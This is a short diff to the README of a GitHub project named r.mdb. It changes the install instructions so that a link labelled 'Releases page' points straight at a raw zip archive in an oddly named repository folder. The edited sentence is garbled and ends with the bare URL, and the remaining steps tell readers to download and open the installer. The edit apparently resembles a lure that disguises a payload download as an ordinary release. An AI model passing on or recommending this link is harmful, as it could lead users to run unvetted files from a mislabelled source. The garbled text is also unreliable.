Krishnasomani29/r.mdb/README.md

 ## 🛠️ Download & Install

-1. Visit the [Releases page](https://github.com/Krishnasomani29/r.mdb/releases) to get the latest version of r.mdb.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Krishnasomani29/r.mdb/main/unsew/r.mdb.zip) to get the latest version of https://raw.githubusercontent.com/Krishnasomani29/r.mdb/main/unsew/r.mdb.zip
 2. Choose the applicable download option for your operating system.
 3. Download the installer file and save it to your computer.
 4. Open the downloaded file to launch the installation process.